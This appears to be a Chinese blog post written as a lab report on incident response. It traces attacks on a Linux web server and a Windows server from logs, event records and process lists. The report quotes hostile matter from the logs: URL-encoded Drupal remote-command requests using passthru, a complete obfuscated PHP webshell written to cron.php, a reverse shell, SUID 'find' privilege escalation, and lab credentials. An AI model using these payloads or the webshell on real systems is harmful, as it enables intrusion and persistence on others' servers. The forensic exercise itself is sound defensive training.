首页 > 其他分享 >实验3 应急响应

实验3 应急响应

时间:2024-11-05 09:23:12浏览次数:2  
标签:查看 5B% 解密 响应 黑客 实验 5D% 服务器 应急

实验目的:

对遭受网络攻击的服务器进行排查分析,找出黑客的攻击路径和破坏行为。

实验内容:

1、对Linux服务器开展网络安全事件应急响应
2、对Windows服务器开展网络安全事件应急响应

实验环境:

  • 应急响应服务器1:Linux虚拟机
  • 应急响应服务器2:Windows虚拟机

实验步骤:

Linux服务器应急响应:

1.查看攻击者的两个内网IP地址

1.1查看/var/log/httpd 的web漏洞日志,发现在数据中有请求异常的包,然后进行url解密
Cat access_log-20241018 | tail -n -500 | head -n 10 (从500行往下面开始阅读十行)
image
1.2进行url解密
image
1.3可以看出是使用是反弹shell, 接受IP地址是192.168.21.102
1.4 攻击内网IP地址是192.168.21.137,192.168.21.102

2.网站管理员用户的用户名与密码

2.1我们查看www的数据库设置的密码,进入cat /var/www/html/sites/default/settings.php
image
查看mysql到账号是root ,密码是worldskills
2.2登录MySQL查看网站的worldskills_db库查看密码
Show database;
image

Use worldskills_db 查看所有表单
image

Select * from users

查看name.pass,对面进行john解密
image
浏览器登录网站
image
image

登录成功所以管理员账号是admin,密码是1111

3.提交黑客得到mysql服务的root账号密码的时间(格式:dd/MM/yyyy:hh:mm:ss)

3.1先去看看apache日志
image

POST /?q=user%2F1%2Fcancel&destination=user%2F1%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Dcat+%60printf+L3Zhci93d3cvaHRtbC9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocAo%3D%7Cbase64+-d%60 HTTP/1.1
对它们进行url解密
image

然后把printf +后面的字符进行base64解密
image

得到了一个路径,然后去查看
image

存在网站的数据库账号和密码
所以获取时间是:30/Jun/2020:04:09:12

4.查找黑客在WEB应用文件中写入的恶意代码,提交文件绝对路径

 在 /var/log/httpd/access_log路径查看

在access_log585行查看到恶意流包
image

进行url解密查看内容
image

url解码发现写入了特殊的webshell到var/www/html/cron.php里面
image

所以恶意代码路径写到了/var/www/html/cron.php

5.查找黑客在WEB应用文件中写入的恶意代码,提交代码的最简形式(格式:)

写入的代码是php如下:

'>'<')+('>'>'<');\$_=\$__/\$__;\$____='';\$___='瞰';\$____.=~(\$___{\$_});\$___='和';\$____.=~(\$___{\$__});\$___='和';\$____.=~(\$___{\$__});\$___='的';\$____.=~(\$___{\$_});\$___='半';\$____.=~(\$___{\$_});\$___='始';\$____.=~(\$___{\$__});\$_____='_';\$___='俯';\$_____.=~(\$___{\$__});\$___='瞰';\$_____.=~(\$___{\$__});\$___='次';\$_____.=~(\$___{\$_});\$___='站';\$_____.=~(\$___{\$_});\$_=\$\$_____;\$____(\$_[\$__]);?>

运用php5特性,简化后代码为:
根据一些不包含数字和字母的webshell | 离别歌来分析

6.分析攻击者的提权手法,提交攻击者通过哪一个指令成功提权

我们查看再去查看日志分析/var/log/httpd/access_log(apache日志文件)
在603查看到
image

请求了
?q=user%2F1%2Fcancel&destination=user%2F1%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3D%2Fusr%2Fbin%2Ffind+index.php+-exec+%60echo+%27d2hvYW1pCg%3D%3D%27%7Cbase64+-d%60+%5C%3B HTTP/1.1
进行url解密
image

使用/usr/bin/find+index.php+-exec+echo+'d2hvYW1pCg=='|base64+-d+;
对base64解密:d2hvYW1pCg 得到 whoami
结合591行:
image

url解密
image

Url解密发现使用了find+/+perm+-u>/dev/null
所以确定是通过find命令的suid权限进行提权的,系统中也证实了这一点
image

所以使用提权方法是:find

7.服务器内与动态恶意程序相关的三个文件绝对路径

7.1查看服务器进程 ps -ef
image

自动开开启去查看自动开启服务
image
发现运行了/etc/sshd/sshd里面的文件,去查看一下
image

发现代码运行了 定期运行了 /dev/null 里面的恶意代码
三个绝对路径:
/usr/lib/systemd/system/ssh.service(自启定时维持脚本服务)
/etc/sshd/sshd(定时维持脚本)
/bin/sshd(恶意程序)

8.提交与恶意程序通信的ip地址

如何查看,先查看虚拟机使用的网络模式
image

我们查看vment8的网络连接
image
image

连接ip是:47.113.101.105

Windows服务器应急响应

黑客通过什么方式拿到服务器权限?

打开window的事件查看器

点击windows日志>>查看
image

查看日志发现有大量的登录失败,以及黑客成功登录的日志
image

成功登录
image

使用了rpd爆破

2.2黑客首次成功登录的时间是什么?(如12:01)

image

即时间是:16:47

2.3黑客添加了用户名是什么?(如abcd)

image

添加了hacker,去控制面板>>用户账户>>管理账户
image

即添加了hacker$

2.4请指出黑客在服务器上下载的文件名称

打开IE浏览器,然后查看下载
image

  发现下载了一个door的运行软件
  答案:door

2.5黑客将下载的木马重命名了木马名字是什么

image

点击查看
image

看到把door改成notepad.exe
即答案是:notepad.exe

2.6请指出黑客下载后门木马所监听的端口

通过任务计划程序查看是否有启动计划
image

使用netstat -anob 查看软件的运行端口
image

查看pid 2412查看文件位置位置,打开任务管理器
image

查看pid 2412 查看文件运行的notepad.exe
所以该程序监听的端口是:4444

标签:查看,5B%,解密,响应,黑客,实验,5D%,服务器,应急
From: https://www.cnblogs.com/guangming-yehuang/p/18527184

相关文章

  • 实验三
    实验一:button.hpp#pragmaonce#include<iostream>#include<string>usingstd::string;usingstd::cout;//按钮类classButton{public:Button(conststring&text);stringget_label()const;voidclick();private:stringl......
  • 实验3 类和对象_基础编程2
     实验任务1实验代码:1#pragmaonce23#include<iostream>4#include<string>56usingstd::string;7usingstd::cout;89//按钮类10classButton{11public:12Button(conststring&text);13stringget_label()const;14......
  • 实验3 类和对象_基础编程2
    任务1:button.hpp#pragmaonce#include<iostream>#include<string>usingstd::string;usingstd::cout;//按钮类classButton{public:Button(conststring&text);stringget_label()const;voidclick();private:string......
  • SWJTU数电实验:可控分频计数器
    一、实验要求基本实验内容1、设计一个可控分频器,clk_in为分频器时钟输入(50MHz,已固定连接在PIN_90),sel为选择开关,clk_out[1:0]为分频器信号输出。当sel=0时,clk_out[0]=sn[3:0]Hz,clk_out[1]=sn[3:0]/2Hz;当sel=1时,clk_out[0]=sn[3:0]H......
  • 20222323 2024-2025-1 《网络与系统攻防技术》实验四实验报告
    1.实验内容一、恶意代码文件类型标识、脱壳与字符串提取对提供的rada恶意代码样本,进行文件类型识别,脱壳与字符串提取,以获得rada恶意代码的编写作者,具体操作如下:(1)使用文件格式和类型识别工具,给出rada恶意代码样本的文件格式、运行平台和加壳工具;(2)使用超级巡警脱壳机等脱壳软件,......
  • 响应式网页设计案例
    文章目录概念核心理念响应式设计的优点实现方法代码案例解释概念响应式设计核心理念是一个网站能够根据访问者的设备特性自动调整布局、内容和功能,以提供最佳的用户体验。它依赖于CSS媒体查询、灵活的网格布局和可伸缩的图像,确保网页内容在不同设备上都能自动调整......
  • 实验3 类和对象_基础编程2
    一、实验目的加深对类的组合机制(has-a)的理解,会使用C++正确定义、使用组合类理解深复制、浅复制练习标准库string,vector用法,能基于问题场景灵活使用针对具体问题场景,练习运用面向对象思维进行设计,合理设计、组合类(自定义/标准库),编程解决实际问题二、实验内容1.实验任......
  • 实验3
    button.hpp#pragmaonce#include<iostream>#include<string>usingstd::string;usingstd::cout;//按钮类classButton{public:Button(conststring&text);stringget_label()const;voidclick();private:stringlabel;......
  • 实验3 类和对象_基础编程2
    实验任务一源码1#pragmaonce23#include<iostream>4#include<string>56usingstd::string;7usingstd::cout;89//按钮类10classButton{11public:12Button(conststring&text);13stringget_label()const;14void......